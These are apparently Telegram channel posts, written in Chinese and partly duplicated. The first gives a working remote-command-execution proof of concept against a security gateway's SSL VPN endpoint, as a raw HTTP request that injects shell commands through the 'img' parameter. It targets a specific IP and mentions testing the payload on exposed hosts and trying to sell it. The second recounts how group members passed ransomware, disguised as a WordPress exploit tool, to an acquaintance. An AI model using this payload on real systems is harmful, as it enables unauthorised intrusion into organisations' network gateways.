关于最近的多平台网关rce
首先这个洞不是图里面山海之关八月18星球里发的那个sslvpn的rce,poc不一样的
最早的出处应该是安全矩阵:http://www.smatrix.org/forum/forum.php?mod=viewthread&tid=5054
在今年八月份
然后seem不知道哪里嫖到poc了跑来给我说有0day让我联系人卖,我就让m3去找了pmf然后人家不收。当时和seem私聊的时候fofa搜资产试了好几个确实能打效果很不错,虽然这是个nday。你要说seem恰烂钱卖nday,有道理,但另一方面这个nday杀伤力确实摆在那里,你说有价值吗,我感觉也有。
然后就是传说的什么这个洞有a卷b卷还是什么c卷的我目测没有,别上当被坑钱。等白盒的代码分析文章出来就清楚了。
poc:
POST /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/某某某.txt|ls HTTP/1.1
Host: 60.167.74.75:4430
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
访问txt能看到rce的回显
首先这个洞不是图里面山海之关八月18星球里发的那个sslvpn的rce,poc不一样的
最早的出处应该是安全矩阵:http://www.smatrix.org/forum/forum.php?mod=viewthread&tid=5054
在今年八月份
然后seem不知道哪里嫖到poc了跑来给我说有0day让我联系人卖,我就让m3去找了pmf然后人家不收。当时和seem私聊的时候fofa搜资产试了好几个确实能打效果很不错,虽然这是个nday。你要说seem恰烂钱卖nday,有道理,但另一方面这个nday杀伤力确实摆在那里,你说有价值吗,我感觉也有。
然后就是传说的什么这个洞有a卷b卷还是什么c卷的我目测没有,别上当被坑钱。等白盒的代码分析文章出来就清楚了。
poc:
POST /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/某某某.txt|ls HTTP/1.1
Host: 60.167.74.75:4430
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
访问txt能看到rce的回显
www.smatrix.org
安恒明御安全网关 sslvpn_RCE POC - 技术转载 安全矩阵
v>GET https://ip:port/sslvpn/sslvpn_client.php?client=logoImg&img=6drcdfs34c1h /tmp || ls |tee/etc/hosts /usr/local/webui/webui/images/basic/login/main_logo21. ... 安恒明御安全网关 sslvpn_RCE POC ,安全矩阵
盲猜又是接受表单数据OGNL表达式解析不严谨,21年表达式注入就各种姿势利用烂了还搁这在控制器里头铁拼接value加代码呢,写个动态调用或者参数化处理includeParams会死吗😅
安全圈年度烧脑剧情片之《我和wordpress超级0dayRCE工具的那点事》
有人觉得这是个犯罪片,我觉得更该算是部伦理片。倾情主演江户川 kiki 山海三人都是我在tg上的老熟人,只是没想到在钱面前这三个剑冢能如此本性暴露。互联网上鱼龙混杂,平日里称兄道弟在利益面前一个比一个的嘴脸恶心,擦亮眼睛,勿轻信他人。
事情的过程比较复杂,概括来说是他们三人先在群内和各种私聊中透露自己“从老外那”购买到了一个所谓的包装了“wordpress0day”的漏洞利用工具,能够直接拿下wp站点的shell,非常之好用云云。然后自己购买服务器搭建wordpress站点自己挂黑页,以此暗示群内他人“工具是真的好用”。
在几天的渲染和包装后,几人开始向包括但不限于至尊,我,M3在内的多人推荐此工具。你以为这就是个卖假漏洞的骗局吗?错了,比你想象的更恶毒。利用熟人之间的信任,12月11日晚上至尊根本就没有多想(“江户川说他拿这玩意上了几千个shell了,他都说没问题那肯定没问题吧,都老熟人了”),就点开了江户川发送的所谓“WPexploit”exe文件,然后马上运行文件的远程主机被锁定。
这个WPexploit就是一个勒索软件,江户川等人目的就是控制至尊的电脑,毕竟至尊是群内公认的京✌🏻富哥僵王博士,设备里的虚拟币钱包助记词和路由器0day都是他们垂涎三尺的东西。锁定至尊电脑过后三人还不忘在群里演戏,“我去我的设备也被锁了怎么办”“完了被老外把团队9台服务器都锁了”这个时候伪装成老外的“软件作者”也恰到好处的出现(就是这几人的小号),山海在给此人“支付3000u”后解开了被锁的服务器。
事情到这里的时候群里大多数人都未察觉真实情况,还真的以为是有人装老外把群里这么多人都算计了,江户川kiki这些和至尊一样都是受害者。我还搁那分析,说这个做套的人是个web神,能挖这么厉害的wp0day然后这个病毒写得这么伪劣(摆烂鼠在群里看了两眼就看出来了shellcode,不免杀360和df,云沙箱也是各种报毒)。至尊会运行这玩意完全是因为他信任江户川和kiki,他俩用了这么多天都没问题。至尊也是非常果断分析出c2服务器的ip过后直接全端口打死,系统重装。经历了最开始的突然过后仔细回想过程至尊也是突然发现了盲点,“为什么你们几个都用了这么多天没问题一到我这我刚一运行就被锁了?”“不会是你们几个下套一起设局来坑我吧?”
第一反应是不可思议,都这么熟了怎么能整出这种烂活来。但是顺着这个思路想怎么想事情的细节怎么对得上。于是乎@山海,他说他给那个工具作者交了3000u解开了服务器,如果这个事情真的是他们自导自演的,那么大概只会在群里说一句“我交了3000u解开了”,而不会真的自己给自己转,查转账记录即可。反复@山海,沉默 转账记录拿不出。最后他自己顶不住压力只能在群里承认是他策划的,事情遂败露。然后就是三人互相推脱责任曝光出彼此之间策划整件事的聊天记录。我只能用原型毕露来形容这几个的嘴脸。
山海:kiki也参与了这件事,他还说什么要做免杀再坑至尊一次。(kiki那聊天记录还是他转发出来的,只能说贼窝就是这样,主打一个大难临头各自飞)
kiki:东西不是我加的,我都没c2,我不会用这么下流的手段,我根本没下毒(然后被他同伙转发他的聊天记录当场背刺)
江户川:你肉鸡有啥价值啊,我没必要搞你啊,你真的想多了我和你这么熟我咋会搞你。(然后就是已销号,频道群组都把我踢了)
我确实非常难以接受,整这个烂活的是他们几个。作为这个群的开群元老几乎是我在tg上最亲密的人了。群里很多没有在场吃瓜的人也都很疑惑怎么回事怎么kiki他们就退了?写这个玩意也是给频道其他人一个交代,以及,记住互联网上,熟人也是信不得的。从替罪鬼到kiki三人组,已经是第二次了,给我狠狠的背刺。Axilft老板说的,警惕混入群聊吹水混脸熟再杀熟的新型诈骗套路,总结到位。
江户川和kiki以及晓骑营这个团伙,最开始八月份山海就在他的群里被曝光诈骗三万u,然后被曝光当天他就关闭了晓骑营的官网,频道停止更新,他给出的理由是“被棒子特工盯上了要隐匿一年,25年回归”然后仅仅是三个月后就原地复活,继续活跃在tg黑灰产前线。在KK时代给老板历史数据说是实时脱库,被老板直接找到来源频道后辩解称“这个网站他这个频道打过我也打过所以数据才是重复的”(现在想起来这理由真的搞笑)包括吃服务器回扣,seem所说的找老板要钱买goby红队版然后买了一块钱的试用,等等等等。之前因为都是熟人没说而已,实际上前科已经很多了,这次搞到至尊头上了搞大了藏不住而已。客观来说,技术是有的,一顿狂扫打nday拿的站也不少,但是指定站点这种,私以为要他们几个打还是有点幽默了,呵呵。要是不怕被骗尽管头铁给他们打钱,尤其是之前在我群里,大家都混个脸熟还不好跑路,现在脸皮都撕破了,这群人本性就这样,会不会跑路想找他们接单的各位自己掂量吧。
国内安全圈的也多加注意,江户川,又名美洲豹(好像在圈内是叫这个),附上微信号,注意避雷吧
有人觉得这是个犯罪片,我觉得更该算是部伦理片。倾情主演江户川 kiki 山海三人都是我在tg上的老熟人,只是没想到在钱面前这三个剑冢能如此本性暴露。互联网上鱼龙混杂,平日里称兄道弟在利益面前一个比一个的嘴脸恶心,擦亮眼睛,勿轻信他人。
事情的过程比较复杂,概括来说是他们三人先在群内和各种私聊中透露自己“从老外那”购买到了一个所谓的包装了“wordpress0day”的漏洞利用工具,能够直接拿下wp站点的shell,非常之好用云云。然后自己购买服务器搭建wordpress站点自己挂黑页,以此暗示群内他人“工具是真的好用”。
在几天的渲染和包装后,几人开始向包括但不限于至尊,我,M3在内的多人推荐此工具。你以为这就是个卖假漏洞的骗局吗?错了,比你想象的更恶毒。利用熟人之间的信任,12月11日晚上至尊根本就没有多想(“江户川说他拿这玩意上了几千个shell了,他都说没问题那肯定没问题吧,都老熟人了”),就点开了江户川发送的所谓“WPexploit”exe文件,然后马上运行文件的远程主机被锁定。
这个WPexploit就是一个勒索软件,江户川等人目的就是控制至尊的电脑,毕竟至尊是群内公认的京✌🏻富哥僵王博士,设备里的虚拟币钱包助记词和路由器0day都是他们垂涎三尺的东西。锁定至尊电脑过后三人还不忘在群里演戏,“我去我的设备也被锁了怎么办”“完了被老外把团队9台服务器都锁了”这个时候伪装成老外的“软件作者”也恰到好处的出现(就是这几人的小号),山海在给此人“支付3000u”后解开了被锁的服务器。
事情到这里的时候群里大多数人都未察觉真实情况,还真的以为是有人装老外把群里这么多人都算计了,江户川kiki这些和至尊一样都是受害者。我还搁那分析,说这个做套的人是个web神,能挖这么厉害的wp0day然后这个病毒写得这么伪劣(摆烂鼠在群里看了两眼就看出来了shellcode,不免杀360和df,云沙箱也是各种报毒)。至尊会运行这玩意完全是因为他信任江户川和kiki,他俩用了这么多天都没问题。至尊也是非常果断分析出c2服务器的ip过后直接全端口打死,系统重装。经历了最开始的突然过后仔细回想过程至尊也是突然发现了盲点,“为什么你们几个都用了这么多天没问题一到我这我刚一运行就被锁了?”“不会是你们几个下套一起设局来坑我吧?”
第一反应是不可思议,都这么熟了怎么能整出这种烂活来。但是顺着这个思路想怎么想事情的细节怎么对得上。于是乎@山海,他说他给那个工具作者交了3000u解开了服务器,如果这个事情真的是他们自导自演的,那么大概只会在群里说一句“我交了3000u解开了”,而不会真的自己给自己转,查转账记录即可。反复@山海,沉默 转账记录拿不出。最后他自己顶不住压力只能在群里承认是他策划的,事情遂败露。然后就是三人互相推脱责任曝光出彼此之间策划整件事的聊天记录。我只能用原型毕露来形容这几个的嘴脸。
山海:kiki也参与了这件事,他还说什么要做免杀再坑至尊一次。(kiki那聊天记录还是他转发出来的,只能说贼窝就是这样,主打一个大难临头各自飞)
kiki:东西不是我加的,我都没c2,我不会用这么下流的手段,我根本没下毒(然后被他同伙转发他的聊天记录当场背刺)
江户川:你肉鸡有啥价值啊,我没必要搞你啊,你真的想多了我和你这么熟我咋会搞你。(然后就是已销号,频道群组都把我踢了)
我确实非常难以接受,整这个烂活的是他们几个。作为这个群的开群元老几乎是我在tg上最亲密的人了。群里很多没有在场吃瓜的人也都很疑惑怎么回事怎么kiki他们就退了?写这个玩意也是给频道其他人一个交代,以及,记住互联网上,熟人也是信不得的。从替罪鬼到kiki三人组,已经是第二次了,给我狠狠的背刺。Axilft老板说的,警惕混入群聊吹水混脸熟再杀熟的新型诈骗套路,总结到位。
江户川和kiki以及晓骑营这个团伙,最开始八月份山海就在他的群里被曝光诈骗三万u,然后被曝光当天他就关闭了晓骑营的官网,频道停止更新,他给出的理由是“被棒子特工盯上了要隐匿一年,25年回归”然后仅仅是三个月后就原地复活,继续活跃在tg黑灰产前线。在KK时代给老板历史数据说是实时脱库,被老板直接找到来源频道后辩解称“这个网站他这个频道打过我也打过所以数据才是重复的”(现在想起来这理由真的搞笑)包括吃服务器回扣,seem所说的找老板要钱买goby红队版然后买了一块钱的试用,等等等等。之前因为都是熟人没说而已,实际上前科已经很多了,这次搞到至尊头上了搞大了藏不住而已。客观来说,技术是有的,一顿狂扫打nday拿的站也不少,但是指定站点这种,私以为要他们几个打还是有点幽默了,呵呵。要是不怕被骗尽管头铁给他们打钱,尤其是之前在我群里,大家都混个脸熟还不好跑路,现在脸皮都撕破了,这群人本性就这样,会不会跑路想找他们接单的各位自己掂量吧。
国内安全圈的也多加注意,江户川,又名美洲豹(好像在圈内是叫这个),附上微信号,注意避雷吧
❤9👍2